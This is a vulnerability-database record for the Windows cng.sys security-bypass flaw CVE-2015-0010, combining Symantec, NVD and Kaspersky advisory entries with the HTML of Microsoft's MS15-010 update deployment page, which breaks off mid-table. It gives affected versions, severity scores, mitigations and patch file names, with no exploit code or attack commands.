Microsoft Windows Kernel 'cng.sys' CVE-2015-0010 Security Bypass Vulnerability
2015-02-10T00:00:00
ID SMNTC-72461 Type symantec Reporter Symantec Security Response Modified 2015-02-10T00:00:00
Description
Description
Microsoft Windows Kernel is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
Technologies Affected
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8 for 32-bit Systems
Microsoft Windows 8 for x64-based Systems
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT 8.1
Microsoft Windows RT
Microsoft Windows Server 2003 Itanium SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 x64 SP2
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Vista Service Pack 2
Microsoft Windows Vista x64 Edition Service Pack 2
Recommendations
Block external access at the network boundary, unless external parties require service.
Filter access to the affected computer at the network boundary if global access isn't required. Restricting access to only trusted computers and networks might greatly reduce the likelihood of exploits.
Deploy network intrusion detection systems to monitor network traffic for malicious activity.
Deploy NIDS to monitor network traffic for anomalous or suspicious activity. Monitor logs generated by NIDS and by the server itself for evidence of attacks against the server.
Permit privileged access for trusted individuals only.
Permitting access to vulnerable applications for trusted individuals only can reduce the risk of an exploit.
Updates are available. Please see the references or vendor advisory for more information.
{"id": "SMNTC-72461", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows Kernel 'cng.sys' CVE-2015-0010 Security Bypass Vulnerability", "description": "### Description\n\nMicrosoft Windows Kernel is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2003 Itanium SP2 \n * Microsoft Windows Server 2003 SP2 \n * Microsoft Windows Server 2003 x64 SP2 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Vista Service Pack 2 \n * Microsoft Windows Vista x64 Edition Service Pack 2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't required. Restricting access to only trusted computers and networks might greatly reduce the likelihood of exploits.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for anomalous or suspicious activity. Monitor logs generated by NIDS and by the server itself for evidence of attacks against the server. \n\n**Permit privileged access for trusted individuals only.** \nPermitting access to vulnerable applications for trusted individuals only can reduce the risk of an exploit.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "published": "2015-02-10T00:00:00", "modified": "2015-02-10T00:00:00", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/72461", "reporter": "Symantec Security Response", "references": [], "cvelist": ["CVE-2015-0010"], "lastseen": "2018-03-13T20:24:09", "viewCount": 2, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2018-03-13T20:24:09", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-0010"]}, {"type": "kaspersky", "idList": ["KLA10474"]}, {"type": "mskb", "idList": ["KB3036220"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805337"]}, {"type": "exploitdb", "idList": ["EDB-ID:37098"]}, {"type": "nessus", "idList": ["SMB_NT_MS15-010.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14254"]}], "modified": "2018-03-13T20:24:09", "rev": 2}, "vulnersScore": 5.6}, "affectedSoftware": [{"version": "2 ", "name": "Microsoft Windows Vista x64 Edition Service Pack", "operator": "eq"}, {"version": "2012 R2 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2003 x64 SP2 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "8 for 32-bit Systems ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2008 R2 for x64-based Systems SP1 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "8.1 for 32-bit Systems ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "8 for x64-based Systems ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2008 for 32-bit Systems SP2 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2 ", "name": "Microsoft Windows Vista Service Pack", "operator": "eq"}, {"version": "2012 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "7 for 32-bit Systems SP1 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2003 Itanium SP2 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2008 for x64-based Systems SP2 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "7 for x64-based Systems SP1 ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "8.1 for x64-based Systems ", "name": "Microsoft Windows", "operator": "eq"}, {"version": "2008 for Itanium-based Systems SP2 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "8.1 ", "name": "Microsoft Windows RT", "operator": "eq"}, {"version": "2008 R2 for Itanium-based Systems SP1 ", "name": "Microsoft Windows Server", "operator": "eq"}, {"version": "2003 SP2 ", "name": "Microsoft Windows Server", "operator": "eq"}], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:21:19", "description": "The CryptProtectMemory function in cng.sys (aka the Cryptography Next Generation driver) in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1, when the CRYPTPROTECTMEMORY_SAME_LOGON option is used, does not check an impersonation token's level, which allows local users to bypass intended decryption restrictions by leveraging a service that (1) has a named-pipe planting vulnerability or (2) uses world-readable shared memory for encrypted data, aka \"CNG Security Feature Bypass Vulnerability\" or MSRC ID 20707.", "edition": 4, "cvss3": {}, "published": "2015-02-11T03:00:00", "title": "CVE-2015-0010", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0010"], "modified": "2019-05-15T17:04:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2015-0010", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0010", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}], "kaspersky": [{"lastseen": "2020-09-02T11:53:43", "bulletinFamily": "info", "cvelist": ["CVE-2015-0003", "CVE-2015-0057", "CVE-2015-0059", "CVE-2015-0060", "CVE-2015-0010", "CVE-2015-0058"], "description": "### *Detect date*:\n02/10/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple critical vulnerabilities have been found in Microsoft products. Malicious users can exploit these vulnerabilities to fain privileges, bypass security restrictions or cause denial of service.\n\n### *Affected products*:\nWindows Server 2003 x86, x64, Itanium Service Pack 2 \nWindows Vista x86, x64 Service Pack 2 \nWindows Server 2008 x86, x64, Itanium Service Pack 2 \nWindows 7 x86, x64 Service Pack 1 \nWindows 2008 R2 x64, Itanium Service Pack 1 \nWindows 8 x86, x64 \nWindows 8.1 x86, x64 \nWindows Server 2012 \nWindows Server 2012 R2 \nWindows RT \nWindows RT 8.1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[MS advisory](<https://technet.microsoft.com/en-us/library/security/ms15-010.aspx>) \n[CVE-2015-0057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0057>) \n[CVE-2015-0060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0060>) \n[CVE-2015-0058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0058>) \n[CVE-2015-0059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0059>) \n[CVE-2015-0010](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0010>) \n[CVE-2015-0003](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0003>) \n\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Microsoft Windows Vista](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Vista-4/>)\n\n### *CVE-IDS*:\n[CVE-2015-0057](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0057>)7.2High \n[CVE-2015-0060](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0060>)4.7Warning \n[CVE-2015-0058](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0058>)7.2High \n[CVE-2015-0059](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0059>)6.9High \n[CVE-2015-0010](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0010>)1.9Warning \n[CVE-2015-0003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0003>)6.9High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[3037639](<http://support.microsoft.com/kb/3037639>) \n[3013455](<http://support.microsoft.com/kb/3013455>) \n[3036220](<http://support.microsoft.com/kb/3036220>) \n[3023562](<http://support.microsoft.com/kb/3023562>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2015-02-10T00:00:00", "id": "KLA10474", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10474", "title": "\r KLA10474Multiple vulnerabilities in Microsoft products ", "type": "kaspersky", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:43:55", "bulletinFamily": "microsoft", "cvelist": ["CVE-2015-0003", "CVE-2015-0057", "CVE-2015-0059", "CVE-2015-0060", "CVE-2015-0010", "CVE-2015-0058"], "description": "<html><body><p>Resolves vulnerabilities in Microsoft Windows that could allow remote code execution if an attacker convinces a user to open a specially crafted document or visit an untrusted website that contains embedded TrueType fonts.</p><h2>Summary</h2><div class=\"kb-summary-section section\"><br/>This security update resolves one publicly disclosed and five privately reported vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker convinces a user to open a specially crafted document or visit an untrusted website that contains embedded TrueType fonts.<br/></div><h2>Introduction</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS15-010. To learn more about this security bulletin:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"https://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-1\" target=\"_self\">https://www.microsoft.com/security/pc-security/updates.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"https://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">https://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"https://technet.microsoft.com/library/security/ms15-010\" id=\"kb-link-3\" target=\"_self\">https://technet.microsoft.com/library/security/MS15-010</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates:<br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals:<br/><a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your Windows-based computer from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country:<br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues and additional information about this security update</h3>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed under each article link.<br/><ul class=\"sbody-free_list\"><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3013455\" id=\"kb-link-8\">3013455 </a> MS15-010: Description of the security update for Windows kernel mode drivers: February 10, 2015</div>Known issues in security update 3013455:<br/><ul class=\"sbody-free_list\"><li>After you install security update 3013455, you may notice some text quality degradation in certain scenarios. The problem occurs on computers that are running the following operating systems:<br/><br/><br/><ul class=\"sbody-free_list\"><li>Windows Server 2008 SP2</li><li>Windows Server 2003 SP2 </li><li>Windows Vista SP2\u00a0</li></ul></li></ul></li><li><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/3023562\" id=\"kb-link-9\">3023562 </a> MS15-010: Description of the security update for Windows kernel mode drivers: February 10, 2015</div></li></ul><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><h3 class=\"sbody-h3\">Windows Server 2003 (all editions)</h3><h4 class=\"sbody-h4\">Reference Table</h4>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3013455-x86-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3013455-x64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2003:<br/><span class=\"text-base\">WindowsServer2003-KB3013455-ia64-ENU.exe</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-10\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">KB3013455.log</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">Use <span class=\"text-base\">Add or Remove</span><span class=\"text-base\">Programs </span>item in <span class=\"text-base\">Control Panel</span> or the Spuninst.exe utility that is located in the %Windir%\\$NTUninstallKB3013455$\\Spuninst folder.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File information</td><td class=\"sbody-td\">See the <a bookmark-id=\"fileinfo\" href=\"#fileinfo\" managed-link=\"\" target=\"\">file information</a> section. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Updates\\Windows Server 2003\\SP3\\KB3013455\\Filelist</td></tr></table></div><h3 class=\"sbody-h3\">Windows Vista (all editions)</h3><h4 class=\"sbody-h4\">Reference Table</h4>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3013455-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3013455-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-11\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update that is installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a bookmark-id=\"fileinfo\" href=\"#fileinfo\" managed-link=\"\" target=\"\">file information</a> section. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h3 class=\"sbody-h3\">Windows Server 2008 (all editions)</h3><h4 class=\"sbody-h4\">Reference Table</h4>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3013455-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3013455-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3013455-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-12\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstall of updates. To uninstall an update that is installed by WUSA, click <span class=\"text-base\">Control Panel</span>, and then click <span class=\"text-base\">Security</span>. Under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a bookmark-id=\"fileinfo\" href=\"#fileinfo\" managed-link=\"\" target=\"\">file information</a> section. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h3 class=\"sbody-h3\">Windows 7 (all editions)</h3><h4 class=\"sbody-h4\">Reference Table</h4>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3013455-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 7:<br/><span class=\"text-base\">Windows6.1-KB3013455-x64.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-13\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the /Uninstall setup switch. Or, click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a bookmark-id=\"fileinfo\" href=\"#fileinfo\" managed-link=\"\" target=\"\">file information</a> section. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h3 class=\"sbody-h3\">Windows Server 2008 R2 (all editions)</h3><h4 class=\"sbody-h4\">Reference Table</h4>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3013455-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008 R2:<br/><span class=\"text-base\">Windows6.1-KB3013455-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-14\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the /Uninstall setup switch. Or, click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, and under <strong class=\"uiterm\">Windows Update</strong>, click <span class=\"text-base\">View installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a bookmark-id=\"fileinfo\" href=\"#fileinfo\" managed-link=\"\" target=\"\">file information</a> section. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h3 class=\"sbody-h3\">Windows 8 and Windows 8.1 (all editions)</h3><h4 class=\"sbody-h4\">Reference Table</h4>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3013455-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8:<br/><span class=\"text-base\">Windows8-RT-KB3013455-x64.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3013455-x86.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows 8.1:<br/><span class=\"text-base\">Windows8.1-KB3013455-x64.msu </span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-15\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">To uninstall an update that is installed by WUSA, use the /Uninstall setup switch. Or, click <span class=\"text-base\">Control Panel</span>, click <span class=\"text-base\">System and Security</span>, click <span class=\"text-base\">Windows Update</span>, and under <strong class=\"uiterm\">See also</strong>, click <span class=\"text-base\">Installed updates</span>, and then select from the list of updates.</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See the <a bookmark-id=\"fileinfo\" href=\"#fileinfo\" managed-link=\"\" target=\"\">file information</a> section. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\"><span class=\"text-base\">Note</span> A registry key does not exist to validate the presence of this update.</td></tr></table></div><h3 class=\"sbody-h3\">Windows Server 2012 and Windows Server 2012 R2 (all editions)</h3><h4 class=\"sbody-h4\">Reference Table</h4>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file name</span></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012:<br/><span class=\"text-base\">Windows8-RT-KB3013455-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported editions of Windows Server 2012 R2:<br/><span class=\"text-base\">Windows8.1-KB3013455-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-16\" target=\"_self\">Microsoft Knowledge Base Article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td 